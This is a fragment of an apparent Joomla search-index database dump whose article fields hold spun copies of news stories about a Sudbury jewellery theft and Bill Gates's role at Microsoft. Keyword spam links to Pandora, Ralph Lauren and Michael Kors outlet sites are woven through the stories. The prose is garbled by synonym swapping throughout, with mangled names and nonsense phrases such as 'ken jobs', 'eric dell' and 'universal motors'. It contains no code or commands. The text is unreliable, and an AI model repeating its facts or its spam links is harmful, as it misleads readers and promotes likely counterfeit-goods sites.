:8:\"79:pages\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:36:\"index.php/79-pages/91-service-page-1\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:5:\"Pages\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Pages\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=91\";s:5:\"route\";s:88:\"index.php?option=com_content&view=article&id=91:service-page-1&catid=79:pages&Itemid=435\";s:5:\"title\";s:14:\"Service Page 1\";s:11:\"description\";s:1911:\"Armani mens watch articles Armani mens watch articles Because the cost of purchasing quality materials, they are very pricey.With the usage quality watches, you won\'t only complement your outfit but also you will look really stylish and embellished.Australia has lots of watch dealers who supply the best watches produced by recognized manufacturers.Yet, the major problem in the matter of purchasing high. Sunglasses are and a fave of mine.Mall google deals an incredible.Secret fixation from calvin klein, armani code away due to giorgio armani, diesel\'s fragrance fuel for life infinite, benetton, forget sixty\'s skip, donna karan\'s dkny wonderful night, espirit with joy, estee lauder\'s parfum purely exotic. The top ten timex watches for men include the ironman shock solar 50 lap digital watch t5j641, t combination of racing black strap t2m552, gents alligator retrograde t2m422,.It has provided birth to the a lot of daring and vibrant iteration of michael kors watches that we get to see in the world today.It represents the flamboyant facet of this line and demonstrates that there is constantly new things to seem forward to. There are people who are so aware about their fashion that they tend to go for distinct brand names, shapes and kinds of vogue jam kw.A single java want a. Michael kors is a united states stylist and presently lives in new york urban Cheap Pandora Charms Canada area.Michael kors bag brand has risen in appeal very fast throughout the last twelve month.Michael kors line aspects.No marvel michael kors goes to optimum of every lady\'s list as a fashion favorite. Skinny organizations are most picked now many with on Pandora Bracelets Canada account of the slim match, white leading and thin the\"Mad adult adult males\"Fad that has actuallyoverrun those who fashion company.If you do not intend to spent money on a trend that could perhaps not last after that this is the exc.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-10 08:19:04\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-10 08:19:04\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(119,'index.php?option=com_content&view=article&id=76','index.php?option=com_content&view=article&id=76:table&catid=78:typography&Itemid=557','Table','Armed thief in sudbury gets jail Armed thief Where Do You Get Pandora Bracelets in sudbury gets jail A one armed man who wriggled free with a gold chain despite being gang tackled by three employees at a downtown jewelry store will pay out a year in jail.','2015-06-15 03:38:08','7863e8b4710a0c72c74a55d93f86d889',1,1,1,'en-GB','2012-11-18 13:45:04','0000-00-00 00:00:00','2012-11-18 13:45:04','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"76\";s:5:\"alias\";s:5:\"table\";s:7:\"summary\";s:4012:\"<p>Armed thief in sudbury gets jail <br /><br />Armed thief <b><a title=\"Where Do You Get Pandora Bracelets\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Where Do You Get Pandora Bracelets</a></b> in sudbury gets jail <br /><br />A one armed man who wriggled free with a gold chain despite being gang tackled by three employees at a downtown jewelry store will pay out a year in jail.<br /><br />Want to say i\'m sorry to the three workers, said byron cromarty from the prisoner\'s box saturday in the ontario court of justice.Felt bad when i hurt you(Woman who collected minor arm and leg injuries).<br /><br />Made a big shame.I was stealing from people who work hard for their funds.Who was simply facing charges of robbery and breach of probation, pleaded in the wrong to breach of probation, and to theft and infiltration, as opposed to robbery.<br /><br />Justice rich humphrey gave cromarty, 23, credit for his 26 days in custody and another 11 <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> months jail and a five year pistols ban.He also ordered cromarty use a genetic sample to the national dna databank.<br /><br />Then of the robbery, cromarty was on an 18 month probation order issued in thinking about receiving.<br /><br />Not the beginer you have robbed someone, humphrey reminded cromarty.Have a problem with drug abuse.I think that is where you need to start.This is a extremely serious offence.It started off as a robbery.<br /><br />Very fortunate the ladies who were involved in your attempted hesitation were not(Earnestly)Wounded.August.31 and asked to recieve a 24 inch, 10 carat gold chain good priced $650.95.<br /><br />When he was shown the chain by a worker, cromarty grabbed it and experimented with leave.<br /><br />The feminine employee, on the flip side, grabbed cromarty\'s left arm and was then accompanied by two other female employees who tried to restrain him.<br /><br />In the melee, about the other hand, cromarty squirmed free and fled using the chain, providing his shirt behind.While cromarty was arrested a short while later, the chain was not recoverable.<br /><br />Maryann rich, a shop assistant at robert brown jewellers, talked to the star a few days following your altercation. (Cromarty)Said \'thank you very much\' while holding among the chains and started walking toward the door, richard remembered. \"He got to the door and i realized he became going to walk out with it.I was surprised.I was surprised.I selected him by the arm and told him \'hey, excuse me, you are not going anywhere\'.Said she was offended by the man\'s boldness and selfishness.That has been all the fuel she needed.Once away from the shop, she tackled the may be thief by his legs.<br /><br />Figured \'how else am i going to tear down this guy\', she told me.Grabbed onto his legs and held on as snugly as i could.He was waiting to hear about me off, pushing through doing this and that, but i was just waiting on hold, <br /><br />Eventually, two of her peers liette soloman and 60 year old linda blake came to her assistance.Still, he squeezed free and escape.<br /><br />A new 5 foot 1, 105 pound rich, who has lived with fibromyalgia syndrome for about 20 years, a break down bruised elbow and a badly scraped knee.<br /><br />Defence lawyer robert beckett told the court wednesday that cromarty only used force in trying to escape and did not intend to assault anyone.<br /><br />Beckett said that cromarty had a hard childhood, is suffering alcohol addiction and lost his right arm while asleep on railway tracks after heavy drinking.However, he said cromarty is a very good young man and is just a few credits short of completing his high school diploma.<br /><br />Come through a lot at age of 23, described beckett.<br /><br />Assistant crown attorney kenrick abbott called the robbery attempt sentence humphrey issued had been highly preferred in a joint submission by beckett and abbott.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"78\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-15 07:38:08\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"5\";s:8:\"category\";s:10:\"Typography\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:8:\"76:table\";s:7:\"catslug\";s:13:\"78:typography\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:69:\"index.php/tables/78-sample-data-articles/features/typography/76-table\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Typography\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Typography\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=76\";s:5:\"route\";s:84:\"index.php?option=com_content&view=article&id=76:table&catid=78:typography&Itemid=557\";s:5:\"title\";s:5:\"Table\";s:11:\"description\";s:3582:\"Armed thief in sudbury gets jail Armed thief Where Do You Get Pandora Bracelets in sudbury gets jail A one armed man who wriggled free with a gold chain despite being gang tackled by three employees at a downtown jewelry store will pay out a year in jail. Want to say i\'m sorry to the three workers, said byron cromarty from the prisoner\'s box saturday in the ontario court of justice.Felt bad when i hurt you(Woman who collected minor arm and leg injuries). Made a big shame.I was stealing from people who work hard for their funds.Who was simply facing charges of robbery and breach of probation, pleaded in the wrong to breach of probation, and to theft and infiltration, as opposed to robbery. Justice rich humphrey gave cromarty, 23, credit for his 26 days in custody and another 11 Cheap Pandora Charms Canada months jail and a five year pistols ban.He also ordered cromarty use a genetic sample to the national dna databank. Then of the robbery, cromarty was on an 18 month probation order issued in thinking about receiving. Not the beginer you have robbed someone, humphrey reminded cromarty.Have a problem with drug abuse.I think that is where you need to start.This is a extremely serious offence.It started off as a robbery. Very fortunate the ladies who were involved in your attempted hesitation were not(Earnestly)Wounded.August.31 and asked to recieve a 24 inch, 10 carat gold chain good priced $650.95. When he was shown the chain by a worker, cromarty grabbed it and experimented with leave. The feminine employee, on the flip side, grabbed cromarty\'s left arm and was then accompanied by two other female employees who tried to restrain him. In the melee, about the other hand, cromarty squirmed free andfled using the chain, providing his shirt behind.While cromarty was arrested a short while later, the chain was not recoverable. Maryann rich, a shop assistant at robert brown jewellers, talked to the star a few days following your altercation. (Cromarty)Said \'thank you very much\' while holding among the chains and started walking toward the door, richard remembered. \"He got to the door and i realized he became going to walk out with it.I was surprised.I was surprised.I selected him by the arm and told him \'hey, excuse me, you are not going anywhere\'.Said she was offended by the man\'s boldness and selfishness.That has been all the fuel she needed.Once away from the shop, she tackled the may be thief by his legs. Figured \'how else am i going to tear down this guy\', she told me.Grabbed onto his legs and held on as snugly as i could.He was waiting to hear about me off, pushing through doing this and that, but i was just waiting on hold, Eventually, two of her peers liette soloman and 60 year old linda blake came to her assistance.Still, he squeezed free and escape. A new 5 foot 1, 105 pound rich, who has lived with fibromyalgia syndrome for about 20 years, a break down bruised elbow and a badly scraped knee. Defence lawyer robert beckett told the court wednesday that cromarty only used force in trying to escape and did not intend to assault anyone. Beckett said that cromarty had a hard childhood, is suffering alcohol addiction and lost his right arm while asleep on railway tracks after heavy drinking.However, he said cromarty is a very good young man and is just a few credits short of completing his high school diploma. Come through a lot at age of 23, described beckett. Assistant crown attorney kenrick abbott called the robbery attempt sentence humphrey issued had been highly preferred in a joint submission by beckett and abbott.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2012-11-18 13:45:04\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2012-11-18 13:45:04\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(120,'index.php?option=com_content&view=article&id=93','index.php?option=com_content&view=article&id=93:faq&catid=79:pages&Itemid=435','FAQ','Bill gates is hoping do the steve jobs Bill gates joins a long line of entrepreneurs, from ken jobs at apple inc.To eric dell at dell inc, who threw their companies into trying to fix what they created. Gates will stay with you while new microsoft corp.Ce','2015-06-17 23:13:25','43715110f0c28d9a3c70138841cb5bd7',1,1,1,'en-GB','2013-12-15 09:19:35','0000-00-00 00:00:00','2013-12-15 09:19:35','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"93\";s:5:\"alias\";s:3:\"faq\";s:7:\"summary\";s:5921:\"<p>Bill gates is hoping do the steve jobs <br /><br />Bill gates joins a long line of entrepreneurs, from ken jobs at apple inc.To eric dell at dell inc, who threw their companies into trying to fix what they created.<br /><br />Gates will stay with you while new microsoft corp.Ceo satya nadella restructures the company.Having moved aside as chairman after 33 years, gates will be a director and work part time as nadella\'s machinery adviser.<br /><br />The hope is that the co founder of earth\'s largest software maker will help it recapture the innovation and invention that set it on its way in 1975.<br /><br />Yet for each and every jobs who returns to apple and invents an iphone, there\'s a case of somebody who should have left his corporate creation alone.<br /><br />Richard schulze troublesome best buy co.\'s revitalisation efforts with a takeover attempt last year.Chip wilson\'s kept as lululemon athletica inc.Chairman impeded alien life aceoas sales growth slowed.Mike lazaridis and his cell phone ltd.Co founder explored buying the having trouble keeping up smartphone maker after he was ousted asceo.Even dating back the early 1900s, billy durant made such a hash of things after he built universal motors co.That they was forced out twice. \"The problem comes if the source of the original success isn\'t what\'s needed to be happy in the future and they can\'t make that change, <br /><br />Jerry yang\'s training at yahoo!Corporation.Is an illustration of this what can happen when a founder confronts a landscape that\'s altered more than he realizes, davis being spoken.Yang started yahoo with david filo in 1995 and watched it grow from a member of family distance as its business manager.He becameceoin 2007 after the company lost its lead in world wide web advertising to google inc.He said he was prepared to fight it out in the future.<br /><br />Two long periods of time later, the stock had lost 60 percent of its value and he\'d quit being forced for spurning a $47.5 billion takeover bid from Microsoft and failing to broker an internet marketing deal with Google.<br /><br />In the early stages,\"He built a great site, davis referred to. \"When he went back, he was not able to figure out what to do next.Facts change.Ibm used to make laptops.Ge were an appliance company, <br /><br />When entrance left theceojob in 2000, microsoft safe 93 percent of consumer computing devices, which at this time were mostly pcs.The particular business had less than 20 percent 12 years later after the market swelled to include smartphones and tablets most not running on microsoft software.<br /><br />A major critique of gates is that he missed the mobile trend.He was part of the management group that developed small screen devices long before apple, and failed to give.The iphone were released in 2007, when he was windows chief software architect.<br /><br />Relatedbill gates to play key role in service at microsoft even if he loses board chairmicrosoft corp names insider satya nadella as next ceo, john thompson to change bill gates as chairman <br /><br />The 58 year old co founder has also been out <b><a title=\"Ralph Lauren Outlet UK\" href=\"http://www.locosounds.co.uk\">Ralph Lauren Outlet UK</a></b> of the day to day game for a long period.He\'s said his philanthropic work will occupy the majority of his time.<br /><br />Really, gates is the programmer who saw the need for a unified computer itself for the fledgling pc in 1981, and microsoft\'s successful efforts to use its monopoly with windows to win the web browser war of the late 1990s almost led to a goverment ordered breakup.Microsoft continues money software than any other company.<br /><br />Gateways and jobs, have been rivals and friends, took different comes near.Gates achieved his initial goal to put a pc on every desk and in every den with a structure that established windows and office as indispensable to companies and the only choice for most individuals.Jobs was more of a builder, famously attentive to the particular design details to make products good looking and easy to use.For example gates, jobs didn\'t devote long to non business pursuits, remaining focused on apple until a couple of <b><a title=\"locosounds\" href=\"http://www.locosounds.co.uk\">locosounds</a></b> months before he died.<br /><br />Jobs returned to an additional in 1997 after a 12 year absence as it struggled for survival, and with the devices invented during his second reign it became the world\'s most effective technology concern.He oversaw the creation of the ipod, the iphone as well as the ipad, changing the landscape of the way people communicate, take notice of music, watch free movies and conduct business.<br /><br />Some founders never leave and write testimonials.And ralph lauren continues to set outfits at his namesake company after 40 years.Dell is spinning his, after he and a financial partner took an additional private last year and he accelerated a plan to retool the pc maker into a supplier of the hardware, software and services a good agent to run data centers.It was under his watch that earth\'s largest coffee shop chain introduced the via packets of instant coffee, now a major driver of abroad growth.Schultz, who has predicted via has to be a billion dollar brand, just handed over day to day operations to his chief financial officer to focus on what he calls\"Next epoch retailing, <br /><br />If gates comes up with a via for ms, nobody will be protesting and complaining about him overstaying his welcome, referred to elaine eisenman, dean of executive and internet business education at babson college in wellesley, boston, and a director at shoe hold dsw inc.<br /><br />The smart coming back to founder\"Comes back with sort of a serial business owner mindset rather than a \'i am here to continue the tradition and the legacy\' mindset, she these. \"That\'s style what schultz did with via, <br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"79\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-18 03:13:25\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:5:\"Pages\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:6:\"93:faq\";s:7:\"catslug\";s:8:\"79:pages\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:25:\"index.php/79-pages/93-faq\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:5:\"Pages\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Pages\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=93\";s:5:\"route\";s:77:\"index.php?option=com_content&view=article&id=93:faq&catid=79:pages&Itemid=435\";s:5:\"title\";s:3:\"FAQ\";s:11:\"description\";s:5548:\"Bill gates is hoping do the steve jobs Bill gates joins a long line of entrepreneurs, from ken jobs at apple inc.To eric dell at dell inc, who threw their companies into trying to fix what they created. Gates will stay with you while new microsoft corp.Ceo satya nadella restructures the company.Having moved aside as chairman after 33 years, gates will be a director and work part time as nadella\'s machinery adviser. The hope is that the co founder of earth\'s largest software maker will help it recapture the innovation and invention that set it on its way in 1975. Yet for each and every jobs who returns to apple and invents an iphone, there\'s a case of somebody who should have left his corporate creation alone. Richard schulze troublesome best buy co.\'s revitalisation efforts with a takeover attempt last year.Chip wilson\'s kept as lululemon athletica inc.Chairman impeded alien life aceoas sales growth slowed.Mike lazaridis and his cell phone ltd.Co founder explored buying the having trouble keeping up smartphone maker after he was ousted asceo.Even dating back the early 1900s, billy durant made such a hash of things after he built universal motors co.That they was forced out twice. \"The problem comes if the source of the original success isn\'t what\'s needed to be happy in the future and they can\'t make that change, Jerry yang\'s training at yahoo!Corporation.Is an illustration of this what can happen when a founder confronts a landscape that\'s altered more than he realizes, davis being spoken.Yang started yahoo with david filo in 1995 and watched it grow from a member of family distance as its business manager.He becameceoin 2007 after the company lost its lead in world wide web advertising to google inc.He said he was prepared to fight it out in the future. Two long periods of time later, the stock had lost 60 percent of its value and he\'d quit being forced for spurning a $47.5 billion takeover bid from Microsoft and failing tobroker an internet marketing deal with Google. In the early stages,\"He built a great site, davis referred to. \"When he went back, he was not able to figure out what to do next.Facts change.Ibm used to make laptops.Ge were an appliance company, When entrance left theceojob in 2000, microsoft safe 93 percent of consumer computing devices, which at this time were mostly pcs.The particular business had less than 20 percent 12 years later after the market swelled to include smartphones and tablets most not running on microsoft software. A major critique of gates is that he missed the mobile trend.He was part of the management group that developed small screen devices long before apple, and failed to give.The iphone were released in 2007, when he was windows chief software architect. Relatedbill gates to play key role in service at microsoft even if he loses board chairmicrosoft corp names insider satya nadella as next ceo, john thompson to change bill gates as chairman The 58 year old co founder has also been out Ralph Lauren Outlet UK of the day to day game for a long period.He\'s said his philanthropic work will occupy the majority of his time. Really, gates is the programmer who saw the need for a unified computer itself for the fledgling pc in 1981, and microsoft\'s successful efforts to use its monopoly with windows to win the web browser war of the late 1990s almost led to a goverment ordered breakup.Microsoft continues money software than any other company. Gateways and jobs, have been rivals and friends, took different comes near.Gates achieved his initial goal to put a pc on every desk and in every den with a structure that established windows and office as indispensable to companies and the only choice for most individuals.Jobs was more of a builder, famously attentive to the particular design details to make products good looking and easy to use.Forexample gates, jobs didn\'t devote long to non business pursuits, remaining focused on apple until a couple of locosounds months before he died. Jobs returned to an additional in 1997 after a 12 year absence as it struggled for survival, and with the devices invented during his second reign it became the world\'s most effective technology 